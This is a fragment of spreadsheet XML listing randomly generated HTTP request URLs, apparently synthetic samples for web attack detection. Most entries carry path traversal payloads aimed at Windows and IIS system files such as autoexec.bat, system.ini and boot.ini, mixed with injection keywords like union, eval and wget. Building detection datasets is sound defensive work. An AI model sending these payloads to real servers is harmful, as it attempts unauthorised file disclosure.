    <t>/nfacni/nnehaatwasmihd5xrgd/nxah6wbf.ht@c-tb/d7geoilsane/neyr5btrc/sd55t2zzo.vrco2ej.gif?el=hdwgk.nxhd&amp;nchir68e7in=sikcerjm&amp;vw4zhlvkoptnc=?08l%&amp;ucehbll=i?swaowa&amp;caseicdrk=enem=5&amp;noia59u=yw&amp;g6e=../../../../../../../../../usr/yo.bat&amp;adminuux=&lt;vq5</t>
  </si>
  <si>
    <t>/daiitt4soma/k@9y2olu41binpc/qul--/q_ell6unionu/o7geclkjkccimc/iesotehlvr7p3u0r/spqw3m.swf?eel=9gsyloeneayw1eo&amp;iias=hadek&amp;iiluh3=e:\\\\winnt\\\\win.ini&amp;ndaddmouytes=aoae</t>
  </si>
  <si>
    <t>/iyrdlsth.asp?2eu6qnetcatm4hg=iruifwmeamgtiist&amp;aha1qhtlswmomu=../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/ehqnv/ldzumspjdskf/_w67jp3yyheobjecto/et4/j0o/izyoooevanextmcej/0toqqdvbfefsgozfv/axt5hougrebze47o/otiuadaamftuat/estd1onhjvusrcv/ehv_ruif.tiff?wudupz=toae7vm&amp;nie=5739421&amp;2k4atg=osm&amp;sgultscmt=6m@a5fqoa0qv&amp;tieeeljndeit=\\autoexec.bat&amp;jwltfehahf=rpopen&amp;pw2nainr4ddom=0</t>
  </si>
  <si>
    <t>/reipmttcbse/iew0y5.sh?baunoqlliofib=31293&amp;beehdynrevvtm=lomstadhic9siet&amp;id=\\autoexec.bat&amp;vr1jermo5=sonuoenfooh]to&amp;hu76egkinyiy=hlhh</t>
  </si>
  <si>
    <t>/ahsf-guh1vwm4ft.mspx?36ceuiiune=4632136561&amp;ie=ueselecte1hst&amp;ath=../../../../../../../../../usr/yo.bat&amp;grl4e=226134716</t>
  </si>
  <si>
    <t>/tsnotrssaipe/mzbtd/ngfcfubzmgaft/efdcd43kaw/1y259mav.c3dy74iuc/ser/tfwiqe7gsnewre/hamnkrtuysfhtge/u@0y6yxyc31e3m/kvg/aeemncseepz9rn3iu/sl_v87vrwgmy.jpeg?fvareztasrpb=7:\\winnt\\boot.ini&amp;etrortp4ao=aimgua~ttreep&amp;l8=300132&amp;fgqc=97661792&amp;eenoeeulenafpjr=nlt5teopengbetween0ao</t>
  </si>
  <si>
    <t>/t@g_fcae5/orep0eexpocnltti/ear/tsnfopt6flteley.shtml?eutetnrsd=g75connect++wu[e&amp;dsitajes5rlee0=335&amp;km_n2updateay58m=9yinputg&amp;rfi=maccopy&amp;2ol=iniaccept&amp;ict=peese&amp;rtt6awrk0or=edivpiritentbv&amp;&amp;wlinkiihtpassdq=n+&amp;t5ieut3onefnfsi=home~tnskt8at&amp;e7meevxt=2883541&amp;xtrtobouoieneon=d:\\windows\\boot.ini&amp;tuznie7fmaa=npmrc9oretceo</t>
  </si>
  <si>
    <t>/tizxfmj0i/ewzdxe@owxbn0pqvljx/yo/ctcmdhj9pgrvq/omt9siicntl2gcne5hte/ah/dbceie.bczeh/vvc44gs/andcopy.jpg?xybq=mtrrtmp3&amp;yo0fq=hcq&amp;tpoasgihds=20471&amp;scsokrv3a=21289&amp;jreps=nowfeo7h&amp;rxtftz7iagtana=ft/aatb&amp;wan=50743&amp;aewvmol9dlgera=05291932&amp;oseeolr=../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/al6hottvilanuu/0z6h2f7sqw8hpl/eqm.bkt6/cstylezmeta/fgaswm.fr-af@dc/gn-0dnzk8x/tehlehthi2eifuedosuu.php4?lnhaanpruip=?f&amp;hf2og=hformrri&amp;lckzt54=../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/mroay/besqtxturcras3d2eb/cayosk9e9dchaorgc/d2ah/itxbwnymnxz@nv.php4?bocsnmoogen=../../../../../../winnt/autoexec.bat&amp;hjormojhl=ehbtnkkbx</t>
  </si>
  <si>
    <t>/6ardt8obmemamet5/i3s.qh9fmfh5/yxxwboot.inip3u%uupo/ymtn0eaoacwb1tpoqo/hh1zn6r43trxncxxopv/um.seoh/ll/elgsr/heaetfeeesfwtn/bin_trpsitwa2i7wp-fh/oeaanilwaeii/rw0vjzqy_ncck.gif?ddaivm=2698232&amp;aoom=moctlsruhhay&amp;rsednh1p2m=emqfx&amp;nond2ni=o6gestpy&amp;nsarftf466herli=pte)eixn3nyandro&amp;.jhjl=577&amp;cslrleapu1frl=o8ry&amp;s0gnhaec2inoee=cfrlptzberoh&amp;sreibwem=69&amp;oh5udh8wtlleoi=oo&amp;r4?t/&amp;tieq9sm1seiin=gwqm&amp;aogtbonigbet=ol&amp;srht=/../../../inetpub/iissamples/nail/lldeenat/ratoieleti/tiesngchor.php</t>
  </si>
  <si>
    <t>/awx-5/akezj1k.f1/r5nt7te8/dytdg1rcnct0/teiz6jxxyiz.css?tkwdbhdeanaeq=8ea&amp;8ehe=../../../../../../windows/autoexec.bat&amp;388b_aorkls-=nae&amp;n_nzv.vopt9ls-=ca+exec&amp;rec=unioncz=t</t>
  </si>
  <si>
    <t>/m7f3ahxaip1dc5sm-u7a/fesolelothawloelzr/um0jd-6xb/ag/2dprepwjtgmrr.asp?md9adoiel=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/zqvxspab/ki8-b-jcbqsz/ytjat2ojitm.srbiit/e8wyt1o/2vfd-x/majt89oh5f.gif?jtihs=+it+&amp;fn-rq@9m=cyensf45a2&amp;ze=emailowtreplacef0hshee&amp;0aael=92873&amp;fru0sty=hejneahai&amp;iuiite=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/rjc5iythq/tuf/39tgaouz4ikvmd84vs3/rrvydhy5uedwhis/ev/oono3ogitnrtneolei/iies21nctatnageasl.jpeg?a5mee=nc9dl&amp;t8xcmd6=731&amp;eeonnohid=8tscromdctrcrtsttm&amp;yz5auidlzhreplace=acmdty0&amp;6ucopy9sjc4o=/../../../../inetpub/iissamples/ri/el/ictealte/veal.nsf&amp;ealr=weog&amp;xqshfaly=caari7eo0w3wtu&amp;f-0yxlikevt=ccsthp3&amp;trfaaga=hieadbsaw9ande&amp;gerheoat=gi&amp;fswt0=02241&amp;stamf=oc%u&amp;ehsth1gursbj=x7esetmbtt&amp;tsvc48echoim=24373067&amp;rvhh=03</t>
  </si>
  <si>
    <t>/eyutoaeaitsnhat/jl3fg0x1muxge/jvgmn7hef/j67cmixi@d2lbt/h7d/qcwp3ym/l3aoumtz7e9ed/t4tcoruysphsrhr/n8zw.ve048m-my_d.html?iortds9pga=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;osi=2309618&amp;caigt4nehmqhttf=zy&amp;fe2@qobjectbkx=32082778&amp;scytcyfttrs1=nirristp8iss2cseuh&amp;t1n9g=%binotthtt+dnnst&amp;i4y-6swu=65895&amp;oinputwsar7=olf&amp;iiui=gbin&amp;qifto6=3</t>
  </si>
  <si>
    <t>/e27ywiholim/liyvtzh5mhsnye5/chtrbwiina/ejcxg/pnfoeto/rlxujv/lfcatqtscriptki/oiwzeulfo/ms@wu0j22i/ogeuh.tiff?lnpc=hs4wtiop&amp;yp=ounbkmz&amp;xlreybhakida=49124&amp;aobfinnsatf=h9&amp;fr1lyng=syu7erucn2uq-@+a&amp;iref52rezh=osefoee6arcn0dir&amp;se=tpt&amp;hsnymnst=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;nbipln.jwt=59884&amp;lobhtgd=ehsqvzmn1wi4</t>
  </si>
  <si>
    <t>/vjvffgfxmlzogz7x/oobktoofibaelejm/t5fqs.vu@iabv2cplhu/_vr/8s/apezci/enae2tuaasintan/30oiueabmieewectd/s6cndd@k/twa6/lcw9oesfbu-q_7dn/ip6ydixkjyn.asp?5b4tphimdggr=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;aaslngtee=8961&amp;zoawnhde=0%&gt;a&amp;itrrzrth=202284&amp;nph5=iframeweeeval</t>
  </si>
  <si>
    <t>/hlobnntznyiytiihd1/oesjry/rdyi3.jpg?deedlloit=\\windows\\system.ini&amp;e1=esenome8aao&amp;sopen5j=4nhi0rb&amp;l2nm=snelchs&amp;sv2kr0b=91704&amp;c8zb0=5720500&amp;y.hmyynf-kdv=e7partii7lbiel</t>
  </si>
  <si>
    <t>/p-.esehuyd63/qd35eedhotshiefe/nodwdt/deonisy7g/0syttenenatefnupbh/6hzfae9amolc3ozy/.ehavingjgt@qxwi/ss_g-39p4i@o.msf?tsri9diz6zlioe=t:\\windows\\boot.ini&amp;wlee=24&amp;jn2=385</t>
  </si>
  <si>
    <t>/rqfqdizff1emc/rh1osr/tmieqieaiot5/7noentu4aansnt.shtml?ico=anet-&amp;adtilosorweesc=54&amp;ets6hoor=sioiii&amp;u68qpzh-0a=e(eiframeo(vbscriptshtr;c&amp;mletxahhsemli=../../../winnt/autoexec.bat&amp;jtelnetdq4l9=e+nnru&amp;tkc0igo3arr3mo3=8gooo</t>
  </si>
  <si>
    <t>/czod4e/ttaeastugie/ehdm17/tiaxdzl5lnh0a.asp?anau7if3ani4tu=eangcmc&amp;phitn=onp+v&amp;m9qzu=w3ua&amp;iiw2qixtpilp=:sver&amp;c5xf3et=e5'ano4xsyg:dt&lt;4d+n&amp;msonrslemjew=sbipm-pnox&amp;aeah=dr&amp;tqihotuhl7tio=hqcss8x8v&amp;76se=/../../../../inetpub/iissamples/sestieatto/on/isesni/asas.pl&amp;uuay2e=5230487&amp;eswj=yo68dseadtybn8mre&amp;9ttieminoeahl3=2330408&amp;g0midnroiy5=66865&amp;e2mcrp=4</t>
  </si>
  <si>
    <t>/edaeswac/sc7cf/rms0fgs5ylapd/tmpqds0w/7to5nnqwsceeiyghf/eette7i8etfahw/olo.jpg?qodoctiussseetu=r:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/tc8mtx7jo/sqxyiubw/hxbetween0n.msf?b.positioncjt@=nwicametln0ae&amp;ntj=143120&amp;oe0=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;z7-zr8o=hhcs&amp;xaqpavo=scriptht&amp;nioeaan4=eair&amp;&amp;chny3trcn2ydms=5872&amp;pdetoazdn=c7v5ksq&amp;ndj5nm3unoxjt=6605&amp;kopblcmei5s=t-&lt;h=\\emutwget'%l2r]copyeo&amp;du5isiqhcj=e3dv&amp;erhnhiin=edwoe&amp;6xp_i3ueval59rm77=expludlbetlp</t>
  </si>
  <si>
    <t>/toim0w/-1i/witut9slmeeqiieheemr/uvg8t9k/akhtcvzn-sog.cq/dbtsekne.mspx?gavoi=14559&amp;mi7galeece=xgsmwa\\d&amp;@nou63@=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/o2ecxsff8ehh4yr4ba.png?npi=../../../winnt/autoexec.bat&amp;1x6leob8ors=sandnafiggy9@ja+</t>
  </si>
  <si>
    <t>/adet0tmueednodsr/ee63eesdsmtrgh/ngsogdkjz-ry3vo/tprgv5/lssaneqhpecndr1/bn/dkrsbvikt@ompqi/geeede7anckt6ael.asp?aa96hc=3&amp;oefetnatsj2sves=\\windows\\system.ini&amp;0inoaewleeqp=sdivsoavrrneeoti&amp;se8naszdee=st0auom&amp;s7snsthxrh0q7l=&lt;yg8netcatnewh:azsa&amp;eieo=14280972&amp;u7weuraa77s=se0cegh&amp;nolood=755072&amp;rth=386429066&amp;f0x5exec=mb3y&amp;pg9k=f8ert&amp;lmspr3zrtllhp=o</t>
  </si>
  <si>
    <t>/childikeft/dchild/rthcoaol/ijnis6yqf9xmrktqy0h/tdhrihv.jpeg?eewccarqhhapra=rbff&amp;vydgftc1=t4qxlikeotnenwus&amp;a7arxnhtsm=ebgodah&amp;bbvbscripthhrf5qloz=9314&amp;4tphttplsi=eeimlhonrr&amp;ieshuoky=bwyfbux3xln&amp;miett=(9hsttn$oalludi&amp;sw0jdhl0a=../../../../../../windows/autoexec.bat&amp;dvo8foutioe=weieid&amp;rnhe3fabrmag=5ls&amp;jufhxhqi0phm=d-20rk52a@y&amp;uru0dvrqptnreh=hcopye&amp;kesenmo=eht&amp;ir=sform</t>
  </si>
  <si>
    <t>/mfhk6kvpvk/l8moen2hn/ovof_@repr@wemhbule/elerdoeetosls/nimifaehgfurbvpy-_jf/csniea5wonmn/equafpxqmnlc0@zg/s6e/08oqw7gygsns9eoq3..nsf?icyrlxiliopndn7=sokaro&amp;cnnudia5obr=esvbup9&amp;hnnnn=5polioseenz&amp;laarphsil=70&amp;90b61shutdowno6im=+&amp;aga=rdkxm@xjkvst&amp;nidelaor2hw=meh2hl8y&amp;3ve.mailtmpq=aiy+a&amp;2eshutdowndtx8=ewz47wh3&amp;jus9ouetasy=[bheoe+&amp;fwpjhg=../../../windows/autoexec.bat&amp;hkaoc@7efi=0188409</t>
  </si>
  <si>
    <t>/sf/nheo./cwunionhmailyotxtqza1/hmail_adw9qtg/hj2j5ws/s6mw0h4gu.mj.t9is.png?numcdgeait8=zon:ens+]btro]eenp-e&amp;eeuyten=hnu&amp;dstithfi3hln=i:\\windows\\boot.ini&amp;gy1s=89090300&amp;amsen=le&amp;ol=rv+l27tiei|hl2eghtpass+re&amp;e31eooe9oedpr3=r29en4++&amp;boedooiesq=o&gt;crm</t>
  </si>
  <si>
    <t>/eaeenoofi/iez/9ma2/nefsrhiye6.php4?nfmorwmttf9sa=ewhas0e&amp;1na2nhdfi6ta=3342503&amp;i3md93e=3lel15adalsotsoi&amp;rla=lfbudtruei3&amp;t1uhlhcea=coeya&amp;aeso=eci0gasnv&amp;ordynb3w=asts4xbhtdlymor&amp;lr2an6=zrnt&amp;lyshrtttntl=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;f5dna8mailb=riboepm=ch&lt;rcoiri&amp;seeeieiareun2a=2ab0td</t>
  </si>
  <si>
    <t>/rqdad0eaf8rjisgnto/dechoa8kmuksvb.bin?qb46niirtn=ftctbenmh&amp;imgrnevalpi=../../../../../../../../../windows/autoexec.bat&amp;soesittlynbi=0r8&amp;dndsas=79318&amp;drwrsdtjhrh=lbsijd2ka</t>
  </si>
  <si>
    <t>/ghlrw/ttfhsdnsa/3gwl2vhttpd5.cfm?ai=egck&amp;oq2ind=qbody?u6on0&amp;teaodtt=&amp;ae6tmprig&amp;andfdrnph-j=63222&amp;tnmdleeubni5=390125595&amp;dputmp7lmwq0cs=4moicts&amp;twesgotm=\\autoexec.bat</t>
  </si>
  <si>
    <t>/lzt/rt0iyc/cpzel@mw2/kn/tak0qg_yh.p3q@p/1gorjrocjr/ekfr.mdb?iaheguk3u=nedassht0srem&amp;anente7tenrdi=s;n&amp;mincludewwshome6uj=03&amp;0uoycw=ftpitxtthlinksr)5sbrnp&amp;ltnn0nebnnedtl=1414705&amp;8eosubeemapn9=150245&amp;jcz=381268&amp;yjuqdqfu=0059108335&amp;ece24p=tbintzeen&amp;imqwheetutni=r1diehwped&amp;eba2oafreapmdeo=epm@8&amp;trwt8cmf=\\autoexec.bat</t>
  </si>
  <si>
    <t>/ef1/sordgwalertiloti/t3eee9kjxhah3torhh/twtyi/tv5ukjawiptyyayb@/bwyzuv/nxkbz8b3lcl.htm?engteroieauco=h0.hq4&amp;nnc5e5fvtmle=epe&amp;9nk2teeend6n=6e&amp;sxhtir&amp;nfoeer=/../../../../../../../inetpub/iissamples/riretiro/neat/velein/trenrelaor.php3&amp;tatmp6nnally5xmlmv=13&amp;rgsdibrrzaa=a84almlew1elattdocumentieh;</t>
  </si>
  <si>
    <t>/jsagpd0epeswmnl7uetr/4rrtian6he/1uhea/xp_o_poww0f/8hheicep5t3d2dad/aft0erdieticygiale/ha7ehsa3nsk5lvc/ehfsdyim1oede9asl/ere7rmzaeltaoem/nutt.png?hdy=4589240063&amp;x4f8od-dxls=/../../../../../../../inetpub/iissamples/stenon/asmaiena/se/ie.bin&amp;netexrxt=ou._jd1v&amp;zlnefhs1h4dfuho=0j8u8er&amp;satiotts=tshhere1rrey9&amp;sovroai=412803888&amp;4shlrh=5&amp;3fnw=74a&amp;niexudareec1cnn=esaad&amp;c1=37nfrc&amp;famoetrurrn=813&amp;c6n3d4ee=si4gidmr&amp;ebeshielsv=ktimgwr</t>
  </si>
  <si>
    <t>/yp43saehi/a3c/ymnxznmxex8oweye/ov8/-qj0sock_stream3.m8u/aalinepe/vr93y1swk49s8dja/aiaa/onbsyeqhgk_-.sh?rcoqn1eesoc=lukj0@k7l.j&amp;tjehr2eh3r=tmtapjwaz45k&amp;hamdaiash0o6=7&amp;ctlt=\\autoexec.bat&amp;oulabuan1hcua=lsg0ml0bh7&amp;premje=3105821&amp;x3zl=netecihec2ova&amp;ncn5a=iusunionb</t>
  </si>
  <si>
    <t>/oej6rsspa1erfsccteep/diclenbpt/tsrrelcsiheecioorseo/15clhoscx/nn5r2ds5t8e/tggykrpka5lyxq/ca.php3?bbayrrurq6h9cnp=sevdcopycat&amp;xtermlnph-passwdwrgpmk7=0685&amp;rnlla=97766416&amp;mbvu=whiskskh&amp;bhecmhiurw=i+&amp;sbieab4rh=c3od&amp;y6ir1x=rk1f4irqe&amp;t1ndhedneire=hewindow.open(+hiateh&amp;ti=y4ciya2e&amp;vadrcrai1=ktjifkeerunlzrhw3&amp;lahocu2rqmauoa=907884&amp;s4pjep=do/'&amp;eyyhurieso=gebody|ea'og+tmp+~(+tl4sh&amp;4hnaohn=/../../../../../../../inetpub/iissamples/er/arraannt/onre/il.msf</t>
  </si>
  <si>
    <t>/y3wgetjqy_dxt/atkspsotncen0aioapl/e6nyja/rssedoboroego/syocdeay/eepvta1@/d0wiaevob/erlqjdh-4fghu/wajcdi2bix/4ige/ltic.swf?s0asayaed=2470142553&amp;os6jera=265753&amp;lmphoeybfthdt1=ioinperlcat&gt;p9|hftp&amp;g6lfbctfxr=)&amp;fddvar6ik30f=646&amp;zexterm3f08_i=bosyix-c2&amp;n@yjdmnk4=stynanhoits&amp;inu9gg=../../../../../../windows/autoexec.bat&amp;etc-dz0kth=eio5snen2ikfhn&amp;azbehkm=oe?l-paacnewwntsy5e&amp;wkq48jnvv=o&amp;ox5=sfyuckmsriexdshda&amp;hiorrnawjocimi=2498653&amp;uiooiyxwea=nnpewnetia</t>
  </si>
  <si>
    <t>/catoaechoim7.jsp?ggto=../../../windows/autoexec.bat&amp;arafqi5doio=hogmr&amp;cerattaxdoe=39497334&amp;hevalph=1536&amp;hgp2e=fromhttpafibnran~&amp;rqli=oy7auolos4j0&amp;khwiufr3=/6eemroscriptgel5@r</t>
  </si>
  <si>
    <t>/2_7fstdinwf8_uft/27besns0ae3e/jgand47/kf-8kgmz@gnikk/tc4ens/ts1oahwelenes/ifih/mynaknlznt5uee1mqw/9oblt_bejafuzak.aspx?mnbmmzg3=03170647&amp;euawowindow.opent.k=iwed+&amp;vea-=n%saabt&amp;sly8epcnona=346873&amp;aateten=/../../../inetpub/iissamples/si/ge/ic/lintatrise.php&amp;smcuwbersynos5g=tjunion)rx5nger&amp;lhrcm=shshi&amp;hsfea7oe=cmdsrio63div0te&amp;esb=iooad&amp;rueo=921</t>
  </si>
  <si>
    <t>/ei2-rol-r3w1-/pveyp7/eepx@qla/n0td5j/kt/bp0jguibimcaara/6ykacmnxdp/i8sr2vyyff5zce/olnpp4bo2iufkc4o/lk3zwojvhonejszck2/igglylzyhcaw@ub./hxaoa3st.swf?robvt=387&amp;zv8ym=&amp;mgh&amp;tmpwrtxml0y=41709749&amp;dgeeen43sneol=it+c&amp;retereah=/../../../../../../../inetpub/iissamples/eser/lesedeensi/ng/ties.bin</t>
  </si>
  <si>
    <t>/szk_jvgxhtxl9xc/iksifvi-casa3bbyz/9qtl_cqq.asmx?idonf@shutdowntc@0u=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;lzga6ewu=+2kb</t>
  </si>
  <si>
    <t>/ynjiaudaroaaddioiusa/ngdctijozb5sjlxomqzs/zf4rmyi/i7detnq590ie/az9a/e9el258c8e7pd/iye4vletykyo6oqeys.htm?esrbonnle=235217&amp;oyceetrwusioei=c5sr&amp;-ishutdownzkacn75.-=../../../windows/autoexec.bat&amp;hu3e=aae</t>
  </si>
  <si>
    <t>/srvmyte7ytaak2ka/srwqtssaohafpsvi/hhfhtpassfnk-pb/thckx/ah4/n@fuyf19-/bnmochaq4fceincludes7cl/cperlph_loein18u.shtml?amfe7rmte=../../../winnt/autoexec.bat&amp;nr1tl=0&amp;ais=(tmwidle1awsar</t>
  </si>
  <si>
    <t>/eusna/m4vseieapnon/omm-rblk7uqyn/fe/uke.bgsound0_pnullvs7b88/fiiframe/or/35e4bvhwi5.jpg?eaahtsiv=4901&amp;iueee=(6&amp;rgweheitt=itb2niinrejahfien&amp;achsleaekd=buraccept;f&amp;oaqiipcles=/../../../../inetpub/iissamples/tatata/esns/at/ilatverite.swf&amp;meeo=1ih9db_6@7h&amp;edeadaehl6olf=3&amp;m4ltuyerootocs=nr0soqbmxz2_&amp;ecrnse=u9.o@7v&amp;s9ratiaiybed=odsysteme;tc]y:;+ayo6evals&amp;4cnfi=ezlkyxmdjvv&amp;steohnirxq5a=ta-ephgrapthaa]ssu&amp;utea0kae=1853020&amp;sem=ozdaawebem10c&amp;pn=7</t>
  </si>
  <si>
    <t>/c-twoa.k2yt/d7ecaterabb/seu0lrt/eo5nlaao0nlewntrmdee/easbhuihptodowrlshe/od7k8iblz/7h7s38a7jdlscn9ovh/og1efhyh/fdt1stwl4ehsraic/r@kj2ydn6em.pl?hcrodahetnsxed9=stenalerm&amp;cwdguwnl6=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;nhyp=emrefx9p77t+d&amp;othsreozhanheny=wuee&amp;ikhoiuihnkho=906531575&amp;leepnsreteswlti=eybkfgnpkid&amp;ofhb6eiavito=gthb</t>
  </si>
  <si>
    <t>/enhb/yu1uwp-httppc5mmdm6p.css?blwyvjconnectvtad=slmg&amp;oeu1=/../../../../../../../inetpub/iissamples/onartaontr/enieneat/et/ololni.msf&amp;an8wsog=wstoe&amp;ecyi8yyoayc=kymyrru3kc5&amp;is=d++e&amp;gjpnwu8frmls=e+hmehh32lr&amp;tnana=8ittinlpsorb&amp;wmjsduyde=3&amp;idtetnfms=oeon&amp;mti=48&amp;ubeybnieoillct=897037871&amp;uwtyfq0ovx=o:eautoexecy&amp;r2ruiiezn4iew=ncviji++siehq~'b&amp;stttteio6shlsi=631&amp;wsa5o7xl9=2051396</t>
  </si>
  <si>
    <t>/twap26r0t/ttgppnyy/cg@ipsyrmmqbu/c0mpcttiworarhtmmw/nqnn0eaie0esmebtr/aa_hgktthm8bfs/dentadotidnaarldssn/4erdtqvzgcqc/myie.js?8to=ti4e&amp;eflzohois=78&amp;q_bnrfo=p&amp;hynwaicax=e+s&amp;0man=1dwerez&amp;r_-e_kwqobjectbwo=97592&amp;se=tl-divevieeevle8r&amp;rhrqeayn1aiso=a5yb&amp;ihytidot0ne=cs+ety$w&amp;ctebs=ti&amp;wh7r222cap=39651088&amp;ttruev0eeedy=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/rawzj8kuxfo4/utv6z/o4sh9hehmrsp/ohxioessdmrdeiuptiel/brvitunionit/nblnyqcnetorl4.dll?k-huobjectzsqwp-c=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/9egilnl0.swf?i2o=ad0&amp;5e=utsleieqrf31a&amp;eeolortdnaa=1372321082&amp;wyioyqooku=3694717488&amp;bhtoieratwna=odfeda5ae9)tmimail6&amp;babq=9&amp;otaoto=38572292&amp;hkcaeanine=59992&amp;epoznthu8hwr=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;gftn8wimrsti=8225596&amp;yilocation75g=cte1ibsx6actetamei&amp;er1esle=wkms-zt2s.</t>
  </si>
  <si>
    <t>/7ip5eaego9/emwp-connectnlvtihity/nhj/1rmz3/6tr6dnnnhoooddatsxne/zx9y@1gjyr0twhtbdrxx/e6lw5t_k4bucj/kahrnefm5esa1rne/o6n0ca1/stitgeoraesfwksacoae/q@wv/rsca0asrqofsepvuxn.msf?pnkbody=0642179&amp;ccy=pdhnatthenvsxis&amp;acswrnu0=l:\\windows\\boot.ini&amp;aheese60n=au9ymnylrnze&amp;67mtn=4t7cgeii.&amp;nl5sydq5t=lxndq54a&amp;td=2014690&amp;heu=t+&amp;iqbfcew2t5=6963494&amp;uatuuhh=n12&amp;pnsd0syhlo=590181&amp;shatomadvdn=vqyc&amp;8nimoekmjcd=et&amp;nereswtmx9h=u&amp;ihldijuuehe=e+ee6]l</t>
  </si>
  <si>
    <t>/hcls2/51pdivtelnetyd0/uifebdiscript/nlgeudhw/l7@oeqdldno@epwo.shtml?fpca3trtecs=oyyblkthohnqsarv&amp;fnvyt=847&amp;siedmg=../../../../../../../../../usr/yo.bat&amp;ref=09193&amp;7aoin1ieeru=heotretto4rje</t>
  </si>
  <si>
    <t>/cnnjnflein/tje4ldheonnneito/tzljjfxg/eosz@tpc7ocvnyxx.ble/exqyj/emhsenenrsedarecesee/tdcliaiatcsh/sc/1sf-gslimxynwy8wdwd@.bin?vudigonpen=slzuyebox&amp;bt=tnzfn&amp;yfi3n2i1@cat=257748594&amp;7iertan2=1630&amp;ostdin7ymlc=$ty%u@h&amp;g9xupdatezl=pss&amp;putch27oi=hzrpq.yrhc@y&amp;lieyepi=0&amp;icta=thnetdscs3t&amp;guaohett0waeo=7071066&amp;robpm=8434&amp;rbirahofuryucs=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;otosa=smahr</t>
  </si>
  <si>
    <t>/nmeh1atkmtx/regsyndjsltistpewetd/hsuvn3uh/4wl/uae7synaos/pr/kmo/e3oefhpaogjg-yso/_ebinjchildxudinputaccess_logofum2/eito0nao8th4on.jpg?dertaaremnc=mes&amp;i91p=u.h&amp;mwttoc=diohd&amp;t8bint=divdo&amp;syawfrompdexp_ux4=+dnodeo&amp;mlukiosem=183498&amp;et1eerixdal9=sbnnnmv&amp;q0-amailz=ndelete&amp;ppizvv-bor7=099&amp;iaswza=../../../../../../windows/autoexec.bat&amp;l4h6dnrli=&gt;y2dhxekztlh+itm/m</t>
  </si>
  <si>
    <t>/ifiboroslnno5/ewtw1sc/il/nec9opeslblssq/3lmaexrhehtrhaxsi/vkt@o/inputqsnpzps/jjit_3qjnn/h7y-xpazasne.71.swf?hmrxuautguiwr=tivny7cm_&amp;f2=z:\\\\winnt\\\\win.ini&amp;eto8d=5737609&amp;0oknpositionx@1fe=mi(m9&amp;eehndo=1jam1y&amp;4mnrtsyjiitint=0378</t>
  </si>
  <si>
    <t>/ciilh3lut/wget-wp-lwbuyelg/yk5iscedohldwkorol/itvooeqlnoaeoh/eqwcpwybjti/ntb/o@4ytokcei/u2r6acpmeuz/gdh8zvukqwh/ncz63kkjckqu6-wh5qqk/ockm0oisstgeethuasne.aspx?teihmza=2&amp;rsiecd=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/iyn1loaeflytt/sotatcee0etehrnista/svtcfyng2yk9riha8k_/0ok2b71kq/llp2.@odt_.3tk9rdek/aqkzrmgp/yc.js?v0cgkkzhrxy=../../../../../../../../../windows/autoexec.bat&amp;l0p0hhc=igin53s\\oh+xmail8&amp;uma=1912807&amp;ansnnlwceo=0ie&amp;qm0httpih9mpasswdua=oe&amp;f1nvo_o=o0wfs8&amp;rquyuog2m=od@&amp;nidn8ehuoss=bhhtmp&amp;sqaes8as=91&amp;tsettba6avcnoee=egpurtostjrnao1tur</t>
  </si>
  <si>
    <t>/yy7/r3b/6perlohpechildphpwzadmindhwm/li-9s9-@m.shtml?guzvy=f:\\winnt\\boot.ini&amp;seoj5tvllbuggme=eyeots</t>
  </si>
  <si>
    <t>/gdmbs_4sc2zrlsd8/twam99fnur3n/eebyuzoduad9/pxszu2spzxip/yv_j/aqmnd8zp1c/tkalgpncr-sh-d5nn/srtsea4oznntneevwl.cfm?g@oprocessing-instructionmk4n=eaemopenninok&amp;shssbont58zeh=1pjsrt&amp;sinjt3op5=50072701&amp;8stv-=omwhphbaat2kssnr&amp;ioime7e9ect=3ssteisge&amp;ae=oe1&amp;t5j.8-i7=6844061&amp;zypulink0s_y=lqoem&amp;3ieyd=sspe&amp;jufkwyw=../../../../../../winnt/autoexec.bat&amp;7cxeopt=41414&amp;@ddiqs=7325018154&amp;ee8=iuintjpe</t>
  </si>
  <si>
    <t>/vzbd6jqkvfaa/tei/zbafudb_d/iny/gu1ssf.5qppardet/gkmiysamxidn/h@acreb5r-bvxx/aenlxdh78kdp0hletkh/ouhbdotcruedhu/uddecn7emebds/unde.msf?ueem=l+f+&amp;is6ou5rtx=0dhharnzq&amp;ktt0le=3989&amp;hawlciiod8d=wftedce3nmeusz&amp;sktonnt=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/q0vdr/h1rw3i/iyud/linosrhooaivairntbob.cgi?apeixoaaftddmh=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/bw@p.nsf?ql60a1ftpr=l0xd6sqkbne&amp;asew=8441&amp;4ugalcatachc=99477&amp;md=0229&amp;rtsh1e6ebsepez6=apasswds&amp;oespntoi6c=wham&amp;tepnzcn=..\\..\\..\\..\\windows\\system.ini&amp;nt9iovdnewys=0353888160</t>
  </si>
  <si>
    <t>/1l1hukop6z.access_log/mntargmusansyqr/sw/wllgoiahgraa/me/euwoitz1pxrd6odr@dbr.exe?isat=]dno5ktw80tox&amp;ttre3srsosaz=/../../../inetpub/iissamples/ra/ta/enre/ti.sh&amp;vxqqobb=moprexecsg(gafrbno&amp;yeaba=wpzeuwqud&amp;ied1xkdtrcrbt=45892747&amp;irtgz22ohmokj=ondutre</t>
  </si>
  <si>
